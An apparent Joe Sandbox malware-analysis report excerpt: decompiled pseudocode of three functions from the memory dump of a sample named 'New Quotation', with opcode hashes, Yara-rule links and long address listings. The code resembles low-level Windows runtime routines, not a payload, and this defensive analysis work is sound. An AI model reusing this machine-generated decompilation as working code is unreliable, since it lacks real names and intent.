                                                                                                                                                                                          0x1d82a4d4
                                                                                                                                                                                          0x1d82a4d7
                                                                                                                                                                                          0x1d82a4d7
                                                                                                                                                                                          0x1d7ccf77
                                                                                                                                                                                          0x1d82a4e6
                                                                                                                                                                                          0x1d82a4ee
                                                                                                                                                                                          0x1d82a4fd
                                                                                                                                                                                          0x1d82a4fd
                                                                                                                                                                                          0x1d82a502
                                                                                                                                                                                          0x1d82a502

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
                                                                                                                                                                                          • Instruction ID: 87d56ddf6d4a6c79f08aca37597efa3d13152d0426646243fdf5910bf41b770d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8300100fa44f8cd702152e592a25aad04b6e1d730c99cde3d70f7b4599d94d13
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0713672944B839FC3328F25CA44B22B7E4BF41B71F904A6DEAD6469E1D770E481CB42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D890EAD Relevance: .2, Instructions: 188COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D890EAD(signed int __ecx, intOrPtr* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed short _v12;
				intOrPtr* _v16;
				signed int _v20;
				short _v22;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				void* _v44;
				void* __ebx;
				intOrPtr* _t110;
				intOrPtr* _t114;
				signed int _t120;
				void* _t125;
				signed int _t126;
				signed int _t129;
				intOrPtr _t130;
				char* _t137;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t164;
				signed int _t167;
				signed short* _t171;
				signed int _t172;
				intOrPtr* _t175;
				signed int _t188;
				signed short _t192;
				signed short _t195;
				intOrPtr _t196;
				signed short _t206;
				unsigned int _t208;
				intOrPtr _t209;
				intOrPtr* _t215;
				signed int _t219;

				_t157 = __edx;
				_v20 = __ecx;
				_v36 = __edx;
				if((_a8 & 0x00000003) != 0) {
					_t162 =  *(__edx + 0x1b) & 0x000000ff;
					_t188 =  *(_a20 + 2) & 0x000000ff;
					_v40 =  *((intOrPtr*)(__edx + 0x10));
					if(_t162 != 0) {
						_t110 =  *((intOrPtr*)(__ecx + 0x5c4 + _t188 * 4)) + 0xffffff98 + _t162 * 0x68;
					} else {
						_t110 =  *((intOrPtr*)(__ecx + 0x3c0 + _t188 * 4));
					}
					_t164 = _a12;
					_v16 = _t110;
					_v8 = (_t164 + 0x00001007 & 0xfffff000) + 0x1000;
					_t114 = _a4;
					 *_t114 = _t157;
					_t192 = (_t114 - (_t114 + 0x0000101f & 0xfffff000) + _a16) / _v8;
					 *((short*)(_t157 + 0x14)) = _t164 + 8 >> 3;
					_t120 = _t192 & 0x0000ffff;
					_v32 = _t120;
					 *(_t157 + 0x18) = _t120;
					 *_t157 = _v16;
					_v12 = _t192;
					 *((char*)(_t157 + 0x1a)) =  *(_a20 + 2);
					 *((short*)(_t157 + 0x16)) = _a8;
					_v22 = _v8;
					_t125 = E1D890DBF(_t157, _t114 + 0x0000101f & 0xfffff000);
					_t167 =  *0x1d8c6964; // 0xaf800bc0
					_t126 = _a4;
					_t206 = _t125 - _t126;
					_v24 = _t206;
					 *(_t126 + 0x10) = _t167 ^ _v24 ^ _v20 ^ _t126;
					_t171 = _t126 + 0x14;
					 *_t171 = _v12;
					_t171[2] = _t126 + 0x1c;
					E1D899D29(_t171);
					_t172 = _a4;
					_t195 = 0;
					_t208 = (_t206 & 0x0000ffff) + _t172;
					_v24 = 0;
					if(_v12 <= 0) {
						L9:
						 *(_t157 + 4) = _t172;
						 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
						 *(_t157 + 0xc) =  *(_t157 + 0xc) & 0x00000000;
						_t215 = _v16 + 0x50;
						do {
							_t129 =  *_t215;
							_t209 =  *((intOrPtr*)(_t215 + 4));
							_v28 = _t129;
							if(_v12 <= 0) {
							}
							_t196 = _t209;
							asm("lock cmpxchg8b [esi]");
						} while (_t129 != _v28 || _t196 != _t209);
						_t175 = _v16;
						_v24 = _v24 & 0x00000000;
						_t130 =  *_t175;
						 *((intOrPtr*)(_t130 + 0x10)) =  *((intOrPtr*)(_t130 + 0x10)) + 1;
						 *((intOrPtr*)(_t175 + 0x58)) =  *((intOrPtr*)(_t130 + 0x10));
						_v24 = _v32;
						asm("lock or [eax], ecx");
						_t210 = _v36;
						 *((intOrPtr*)(_a4 + 0xc)) = 0xf0e0d0c0;
						 *((intOrPtr*)(_v36 + 0x1c)) = 1;
						asm("lock cmpxchg [edx], ecx");
						if(E1D7E3C40() == 0) {
							_t137 = 0x7ffe0380;
						} else {
							_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t137 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E1D88F68C(1,  *((intOrPtr*)(_v20 + 0xc)),  *((intOrPtr*)(_t210 + 4)),  *(_t210 + 0x14) & 0x0000ffff,  *(_t210 + 0x18) & 0x0000ffff,  *(_t210 + 0x1b) & 0x000000ff);
						}
						return 1;
					} else {
						_v28 = _v8 << 0xd;
						_t219 = _t208 - _t172 << 0xd;
						do {
							 *_t208 = _t208 >> 0x00000003 ^ _t219 ^  *0x1d8c6964 ^  *(_v20 + 0xc);
							 *(_t208 + 4) = (_t195 & 0x0000ffff) << 0x00000008 |  *(_t208 + 4) & 0xff0000ff;
							 *((char*)(_t208 + 7)) = 0x80;
							E1D890E4F(_t157, _t208);
							_t208 = _t208 + _v8;
							_t219 = _t219 + _v28;
							_t195 = _v24 + 1;
							_v24 = _t195;
						} while (_t195 < _v12);
						_t172 = _a4;
						goto L9;
					}
				}
				return 0;
			}







































                                                                                                                                                                                          0x1d890ebc
                                                                                                                                                                                          0x1d890ebe
                                                                                                                                                                                          0x1d890ec1
                                                                                                                                                                                          0x1d890ec4
                                                                                                                                                                                          0x1d890ed4
                                                                                                                                                                                          0x1d890ed8
                                                                                                                                                                                          0x1d890edc
                                                                                                                                                                                          0x1d890ee2
                                                                                                                                                                                          0x1d890efa
                                                                                                                                                                                          0x1d890ee4
                                                                                                                                                                                          0x1d890ee4
                                                                                                                                                                                          0x1d890ee4
                                                                                                                                                                                          0x1d890efc
                                                                                                                                                                                          0x1d890f04
                                                                                                                                                                                          0x1d890f14
                                                                                                                                                                                          0x1d890f17
                                                                                                                                                                                          0x1d890f1a
                                                                                                                                                                                          0x1d890f2e
                                                                                                                                                                                          0x1d890f39
                                                                                                                                                                                          0x1d890f3d
                                                                                                                                                                                          0x1d890f40
                                                                                                                                                                                          0x1d890f43
                                                                                                                                                                                          0x1d890f4a
                                                                                                                                                                                          0x1d890f4e
                                                                                                                                                                                          0x1d890f56
                                                                                                                                                                                          0x1d890f5d
                                                                                                                                                                                          0x1d890f64
                                                                                                                                                                                          0x1d890f68
                                                                                                                                                                                          0x1d890f6d
                                                                                                                                                                                          0x1d890f75
                                                                                                                                                                                          0x1d890f78
                                                                                                                                                                                          0x1d890f7d
                                                                                                                                                                                          0x1d890f89
                                                                                                                                                                                          0x1d890f8c
                                                                                                                                                                                          0x1d890f92
                                                                                                                                                                                          0x1d890f94
                                                                                                                                                                                          0x1d890f97
                                                                                                                                                                                          0x1d890f9c
                                                                                                                                                                                          0x1d890f9f
                                                                                                                                                                                          0x1d890fa4
                                                                                                                                                                                          0x1d890fa6
                                                                                                                                                                                          0x1d890fac
                                                                                                                                                                                          0x1d891008
                                                                                                                                                                                          0x1d89100b
                                                                                                                                                                                          0x1d89100e
                                                                                                                                                                                          0x1d891012
                                                                                                                                                                                          0x1d891016
                                                                                                                                                                                          0x1d891019
                                                                                                                                                                                          0x1d891019
                                                                                                                                                                                          0x1d891020
                                                                                                                                                                                          0x1d891023
                                                                                                                                                                                          0x1d89102c
                                                                                                                                                                                          0x1d89102c
                                                                                                                                                                                          0x1d891031
                                                                                                                                                                                          0x1d891034
                                                                                                                                                                                          0x1d891038
                                                                                                                                                                                          0x1d891041
                                                                                                                                                                                          0x1d891044
                                                                                                                                                                                          0x1d891048
                                                                                                                                                                                          0x1d89104a
                                                                                                                                                                                          0x1d891050
                                                                                                                                                                                          0x1d891058
                                                                                                                                                                                          0x1d89105f
                                                                                                                                                                                          0x1d891067
                                                                                                                                                                                          0x1d89106e
                                                                                                                                                                                          0x1d89107b
                                                                                                                                                                                          0x1d89107e
                                                                                                                                                                                          0x1d891089
                                                                                                                                                                                          0x1d89109b
                                                                                                                                                                                          0x1d89108b
                                                                                                                                                                                          0x1d891094
                                                                                                                                                                                          0x1d891094
                                                                                                                                                                                          0x1d8910a3
                                                                                                                                                                                          0x1d8910cf
                                                                                                                                                                                          0x1d8910cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d890fae
                                                                                                                                                                                          0x1d890fb8
                                                                                                                                                                                          0x1d890fbb
                                                                                                                                                                                          0x1d890fbe
                                                                                                                                                                                          0x1d890fd1
                                                                                                                                                                                          0x1d890fe5
                                                                                                                                                                                          0x1d890fea
                                                                                                                                                                                          0x1d890fee
                                                                                                                                                                                          0x1d890ff6
                                                                                                                                                                                          0x1d890ff9
                                                                                                                                                                                          0x1d890ffc
                                                                                                                                                                                          0x1d890ffd
                                                                                                                                                                                          0x1d891000
                                                                                                                                                                                          0x1d891005
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891005
                                                                                                                                                                                          0x1d890fac
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 494c77d6073b5ea345db59347067ac73f6d00960fbb7d3e6a966ceb3bf0b2c86
                                                                                                                                                                                          • Instruction ID: 701d048a75ca3edcbe3ad1834d4007c4e984c6a1449cf05e6943a3d08cfd0e89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 494c77d6073b5ea345db59347067ac73f6d00960fbb7d3e6a966ceb3bf0b2c86
                                                                                                                                                                                          • Instruction Fuzzy Hash: D1816B75A04259CFCB09CF68C480AAEBBF1FF88300F1581A9E859EB355D735EA41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D898E26 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                          			E1D898E26(signed int __ecx) {
				signed int _v8;
				signed int _v11;
				intOrPtr _v15;
				short _v41;
				char _v47;
				intOrPtr _v48;
				signed int _v52;
				char _v55;
				signed int _v56;
				char _v60;
				intOrPtr _v63;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				signed int _t65;
				char* _t71;
				void* _t72;
				signed int _t92;
				signed int _t93;
				void* _t94;
				signed char _t96;
				intOrPtr* _t103;
				signed int _t112;
				signed int _t113;
				signed int _t119;
				signed int _t120;
				void* _t124;
				signed int _t126;
				signed int _t128;
				signed int* _t130;
				void* _t131;
				signed int _t134;
				signed int _t135;

				_t95 = __ecx;
				_t137 = (_t135 & 0xfffffff8) - 0x3c;
				_v8 =  *0x1d8cb370 ^ (_t135 & 0xfffffff8) - 0x0000003c;
				_t2 = _t95 + 0x44; // 0x44
				_t128 = _t2;
				_v56 = __ecx;
				_v60 = __ecx;
				_t59 =  *_t128;
				_v52 = _t128;
				if(( *(_t128 + 4) & 0x00000001) != 0) {
					if(_t59 == 0) {
						_t59 = 0;
					} else {
						_t59 = _t59 ^ _t128;
					}
				}
				_t96 =  *(_t128 + 4);
				_t92 = _t96 & 1;
				if(_t59 == 0) {
					L22:
					 *_t128 =  *_t128 & 0x00000000;
					 *(_t128 + 4) =  *(_t128 + 4) & 0x00000000;
					if((_t96 & 0x00000001) != 0) {
						 *(_t128 + 4) = 1;
					}
					_t122 = _v60;
					_t93 = _v60 + 0x210;
					while(1) {
						_t129 =  *_t93;
						if( *_t93 == 0) {
							break;
						}
						E1D89FD27(_t122 + 0x200, _t129 ^ _t93);
						E1D8A004A(_t122 + 0x200, _t129 ^ _t93, 1);
					}
					E1D896679(_v60 + 0x2c0);
					E1D89B707();
					E1D89B707();
					_t103 = _v60;
					_v48 =  *((intOrPtr*)(_t103 + 4));
					_t65 =  *((intOrPtr*)(_t103 + 0xc0)) - _t103;
					_v52 =  *_t103;
					_v56 = _t65;
					_push( *((intOrPtr*)(_t103 + 4)));
					_push( *_t103);
					if(( *(_t103 + 0x16) & 0x00000001) == 0) {
						asm("sbb eax, eax");
						_push((_t65 & 0x01000000) + 0x8000);
						E1D898845( &_v60,  &_v56);
					} else {
						E1D899629(_t103);
					}
					E1D899A57( &_v55, 0);
					if(E1D7E3C40() == 0) {
						_t71 = 0x7ffe0388;
					} else {
						_t71 = ( *[fs:0x30])[0x14] + 0x22e;
					}
					if( *_t71 != 0) {
						E1D88D9C6(_v63);
					}
					_t72 = E1D7E3C40();
					_t130 = 0x7ffe0380;
					if(_t72 == 0) {
						_t73 = 0x7ffe0380;
					} else {
						_t73 = ( *[fs:0x30])[0x14] + 0x226;
					}
					if( *_t73 != 0) {
						_t73 =  *[fs:0x30];
						if((( *[fs:0x30])[0x90] & 0x00000001) != 0) {
							if(E1D7E3C40() != 0) {
								_t130 = ( *[fs:0x30])[0x14] + 0x226;
							}
							_v15 = _v63;
							_v41 = 0x1023;
							_push( &_v47);
							_push("true");
							_push(0x402);
							_push( *_t130 & 0x000000ff);
							_t73 = E1D812F90();
						}
					}
					_pop(_t124);
					_pop(_t131);
					_pop(_t94);
					return E1D814B50(_t73, _t94, _v11 ^ _t137, 0, _t124, _t131);
				}
				_t134 = _v56;
				while(1) {
					L6:
					_t112 =  *_t59;
					if(_t112 != 0) {
						break;
					}
					_t113 =  *(_t59 + 4);
					if(_t113 == 0) {
						_t126 =  *(_t59 + 8) & 0xfffffffc;
						if(_t92 != 0 && _t126 != 0) {
							_t126 = _t126 ^ _t59;
						}
						E1D89A464(_t92, _t113, _t59, _t134);
						if(_t126 == 0) {
							_t128 = _v52;
							_t96 =  *(_t128 + 4);
							goto L22;
						} else {
							_t59 = _t126;
							continue;
						}
					}
					_t120 = _t59;
					if(_t92 == 0) {
						_t59 = _t113;
					} else {
						_t59 = _t59 ^ _t113;
					}
					 *(_t120 + 4) =  *(_t120 + 4) & 0x00000000;
				}
				_t119 = _t59;
				if(_t92 == 0) {
					_t59 = _t112;
				} else {
					_t59 = _t59 ^ _t112;
				}
				 *_t119 =  *_t119 & 0x00000000;
				goto L6;
			}





































                                                                                                                                                                                          0x1d898e26
                                                                                                                                                                                          0x1d898e2e
                                                                                                                                                                                          0x1d898e38
                                                                                                                                                                                          0x1d898e3e
                                                                                                                                                                                          0x1d898e3e
                                                                                                                                                                                          0x1d898e41
                                                                                                                                                                                          0x1d898e45
                                                                                                                                                                                          0x1d898e4d
                                                                                                                                                                                          0x1d898e50
                                                                                                                                                                                          0x1d898e54
                                                                                                                                                                                          0x1d898e58
                                                                                                                                                                                          0x1d898e5e
                                                                                                                                                                                          0x1d898e5a
                                                                                                                                                                                          0x1d898e5a
                                                                                                                                                                                          0x1d898e5a
                                                                                                                                                                                          0x1d898e58
                                                                                                                                                                                          0x1d898e60
                                                                                                                                                                                          0x1d898e66
                                                                                                                                                                                          0x1d898e6b
                                                                                                                                                                                          0x1d898ec7
                                                                                                                                                                                          0x1d898ec7
                                                                                                                                                                                          0x1d898eca
                                                                                                                                                                                          0x1d898ed1
                                                                                                                                                                                          0x1d898ed3
                                                                                                                                                                                          0x1d898ed3
                                                                                                                                                                                          0x1d898ed7
                                                                                                                                                                                          0x1d898edb
                                                                                                                                                                                          0x1d898ee1
                                                                                                                                                                                          0x1d898ee1
                                                                                                                                                                                          0x1d898ee5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898ef1
                                                                                                                                                                                          0x1d898f00
                                                                                                                                                                                          0x1d898f00
                                                                                                                                                                                          0x1d898f11
                                                                                                                                                                                          0x1d898f20
                                                                                                                                                                                          0x1d898f2f
                                                                                                                                                                                          0x1d898f34
                                                                                                                                                                                          0x1d898f3d
                                                                                                                                                                                          0x1d898f47
                                                                                                                                                                                          0x1d898f49
                                                                                                                                                                                          0x1d898f4d
                                                                                                                                                                                          0x1d898f55
                                                                                                                                                                                          0x1d898f58
                                                                                                                                                                                          0x1d898f5a
                                                                                                                                                                                          0x1d898f6e
                                                                                                                                                                                          0x1d898f7a
                                                                                                                                                                                          0x1d898f7b
                                                                                                                                                                                          0x1d898f5c
                                                                                                                                                                                          0x1d898f5c
                                                                                                                                                                                          0x1d898f5c
                                                                                                                                                                                          0x1d898f86
                                                                                                                                                                                          0x1d898f92
                                                                                                                                                                                          0x1d898fa4
                                                                                                                                                                                          0x1d898f94
                                                                                                                                                                                          0x1d898f9d
                                                                                                                                                                                          0x1d898f9d
                                                                                                                                                                                          0x1d898fac
                                                                                                                                                                                          0x1d898fb2
                                                                                                                                                                                          0x1d898fb2
                                                                                                                                                                                          0x1d898fb7
                                                                                                                                                                                          0x1d898fbc
                                                                                                                                                                                          0x1d898fc8
                                                                                                                                                                                          0x1d898fd7
                                                                                                                                                                                          0x1d898fca
                                                                                                                                                                                          0x1d898fd3
                                                                                                                                                                                          0x1d898fd3
                                                                                                                                                                                          0x1d898fdc
                                                                                                                                                                                          0x1d898fde
                                                                                                                                                                                          0x1d898feb
                                                                                                                                                                                          0x1d898ff4
                                                                                                                                                                                          0x1d898fff
                                                                                                                                                                                          0x1d898fff
                                                                                                                                                                                          0x1d899007
                                                                                                                                                                                          0x1d899010
                                                                                                                                                                                          0x1d899019
                                                                                                                                                                                          0x1d89901a
                                                                                                                                                                                          0x1d89901c
                                                                                                                                                                                          0x1d899024
                                                                                                                                                                                          0x1d899025
                                                                                                                                                                                          0x1d899025
                                                                                                                                                                                          0x1d898feb
                                                                                                                                                                                          0x1d89902e
                                                                                                                                                                                          0x1d89902f
                                                                                                                                                                                          0x1d899030
                                                                                                                                                                                          0x1d89903b
                                                                                                                                                                                          0x1d89903b
                                                                                                                                                                                          0x1d898e6d
                                                                                                                                                                                          0x1d898e71
                                                                                                                                                                                          0x1d898e71
                                                                                                                                                                                          0x1d898e71
                                                                                                                                                                                          0x1d898e75
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898e88
                                                                                                                                                                                          0x1d898e8d
                                                                                                                                                                                          0x1d898ea4
                                                                                                                                                                                          0x1d898ea9
                                                                                                                                                                                          0x1d898eaf
                                                                                                                                                                                          0x1d898eaf
                                                                                                                                                                                          0x1d898eb3
                                                                                                                                                                                          0x1d898eba
                                                                                                                                                                                          0x1d898ec0
                                                                                                                                                                                          0x1d898ec4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898ebc
                                                                                                                                                                                          0x1d898ebc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d898ebc
                                                                                                                                                                                          0x1d898eba
                                                                                                                                                                                          0x1d898e8f
                                                                                                                                                                                          0x1d898e93
                                                                                                                                                                                          0x1d898e99
                                                                                                                                                                                          0x1d898e95
                                                                                                                                                                                          0x1d898e95
                                                                                                                                                                                          0x1d898e95
                                                                                                                                                                                          0x1d898e9b
                                                                                                                                                                                          0x1d898e9b
                                                                                                                                                                                          0x1d898e77
                                                                                                                                                                                          0x1d898e7b
                                                                                                                                                                                          0x1d898e81
                                                                                                                                                                                          0x1d898e7d
                                                                                                                                                                                          0x1d898e7d
                                                                                                                                                                                          0x1d898e7d
                                                                                                                                                                                          0x1d898e83
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9097a0c9cd7f112ef54b6336ffcabb51e24a48f2c0d697be81e7c5135b25b9fe
                                                                                                                                                                                          • Instruction ID: aa93a398ac5877be08a8a462c81c5690a54f8ea02eed77b0ce397cd2bcf54187
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9097a0c9cd7f112ef54b6336ffcabb51e24a48f2c0d697be81e7c5135b25b9fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: D461AC35628742CBD70ACB28C854B6AB7E5BFC0714F15486DB9D58B2A1DB39E805CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CB931 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E1D7CB931(void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t66;
				signed short _t67;
				signed short _t69;
				intOrPtr _t70;
				signed short _t84;
				void* _t85;
				signed short _t88;
				signed short _t90;
				intOrPtr _t91;
				signed short _t96;
				intOrPtr _t98;
				intOrPtr* _t101;
				signed short _t102;
				signed short _t104;
				void* _t105;
				char* _t106;
				signed short _t107;
				intOrPtr* _t113;
				signed short _t116;
				intOrPtr* _t117;
				void* _t118;
				void* _t121;
				intOrPtr* _t123;

				_t109 = __edx;
				_push(0x90);
				_push(0x1d8abad8);
				E1D827C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t121 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t121 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t121 - 0x8c)) =  *((intOrPtr*)(_t121 + 0xc));
				 *((intOrPtr*)(_t121 - 0x88)) =  *((intOrPtr*)(_t121 + 0x10));
				 *((intOrPtr*)(_t121 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t98 =  *((intOrPtr*)(_t121 - 0x78));
					_t66 =  *(_t98 + 0xfca) & 0x0000ffff;
					__eflags = _t66 & 0x00000002;
					if((_t66 & 0x00000002) != 0) {
						L3:
						_t67 = 0;
						L4:
						 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0x10));
						return _t67;
					}
					 *(_t98 + 0xfca) = _t66 | 0x00000002;
					_t113 = 0;
					_t116 = 0;
					_t96 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t96 - 0x200;
						if(_t96 >= 0x200) {
							break;
						}
						E1D816510(0x80);
						 *((intOrPtr*)(_t121 - 0x18)) = _t123;
						_t113 = _t123;
						_t96 = _t96 - 0xffffff80;
						_t18 = _t121 - 4;
						 *_t18 =  *(_t121 - 4) & 0x00000000;
						__eflags =  *_t18;
						_t109 =  *((intOrPtr*)(_t121 - 0x84));
						_t117 =  *((intOrPtr*)(_t121 - 0x84));
						_t105 = _t117 + 1;
						do {
							_t84 =  *_t117;
							_t117 = _t117 + 1;
							__eflags = _t84;
						} while (_t84 != 0);
						_t118 = _t117 - _t105;
						_t22 = _t96 - 1; // -129
						_t85 = _t22;
						__eflags = _t118 - _t85;
						if(_t118 > _t85) {
							_t118 = _t85;
						}
						E1D8188C0(_t113, _t109, _t118);
						_t123 = _t123 + 0xc;
						_t106 = _t118 + _t113;
						 *((intOrPtr*)(_t121 - 0x80)) = _t106;
						_t88 = _t96 - _t118;
						__eflags = _t88;
						_push(0);
						if(_t88 == 0) {
							L15:
							_t116 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t88 - 0x7fffffff;
							if(_t88 <= 0x7fffffff) {
								L16:
								 *(_t121 - 0x94) = _t116;
								__eflags = _t116;
								if(_t116 < 0) {
									__eflags = _t88;
									if(_t88 != 0) {
										 *_t106 = 0;
									}
									L26:
									 *(_t121 - 0xa0) = _t116;
									 *(_t121 - 4) = 0xfffffffe;
									__eflags = _t116;
									if(_t116 >= 0) {
										L31:
										_t101 = _t113;
										_t40 = _t101 + 1; // 0x1
										_t109 = _t40;
										do {
											_t69 =  *_t101;
											_t101 = _t101 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t102 = _t101 - _t109;
										__eflags = _t102;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t121 - 0x74)) = 0x40010006;
											 *(_t121 - 0x6c) =  *(_t121 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t121 - 0x64)) = 2;
											 *(_t121 - 0x70) =  *(_t121 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t121 - 0x60)) = (_t102 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t121 - 0x5c)) = _t113;
											 *(_t121 - 4) = 1;
											_push(_t121 - 0x74);
											E1D828A60(_t102, _t109);
											 *(_t121 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t121 + 8)));
										_push( *((intOrPtr*)(_t121 - 0x9c)));
										_push(_t102 & 0x0000ffff);
										_push(_t113);
										_push(1);
										_t104 = E1D8147C0();
										__eflags =  *((char*)(_t121 + 0x14)) - 1;
										if( *((char*)(_t121 + 0x14)) == 1) {
											__eflags = _t104 - 0x80000003;
											if(_t104 == 0x80000003) {
												E1D814CF0(1);
												_t104 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) & 0x0000fffd;
										_t67 = _t104;
										goto L4;
									}
									__eflags = _t116 - 0x80000005;
									if(_t116 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t121 - 0x90) = 0;
								 *((intOrPtr*)(_t121 - 0x7c)) = _t88 - 1;
								_t90 = E1D817810(_t106, _t88 - 1,  *((intOrPtr*)(_t121 - 0x8c)),  *((intOrPtr*)(_t121 - 0x88)));
								_t123 = _t123 + 0x10;
								_t107 = _t90;
								_t91 =  *((intOrPtr*)(_t121 - 0x7c));
								__eflags = _t107;
								if(_t107 < 0) {
									L21:
									_t116 = 0x80000005;
									 *(_t121 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t91 +  *((intOrPtr*)(_t121 - 0x80)))) = 0;
									L23:
									 *(_t121 - 0x94) = _t116;
									goto L26;
								}
								__eflags = _t107 - _t91;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t116;
					if(_t116 >= 0) {
						goto L31;
					}
					__eflags = _t116 - 0x80000005;
					if(_t116 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t96 + _t113 - 2)) = 0xa;
					_t39 = _t96 - 1; // -129
					_t102 = _t39;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t121 + 8)));
				_push(_t109);
				if(E1D813DC0() != 0) {
					goto L6;
				}
				goto L3;
			}


























                                                                                                                                                                                          0x1d7cb931
                                                                                                                                                                                          0x1d7cb931
                                                                                                                                                                                          0x1d7cb936
                                                                                                                                                                                          0x1d7cb93b
                                                                                                                                                                                          0x1d7cb940
                                                                                                                                                                                          0x1d7cb946
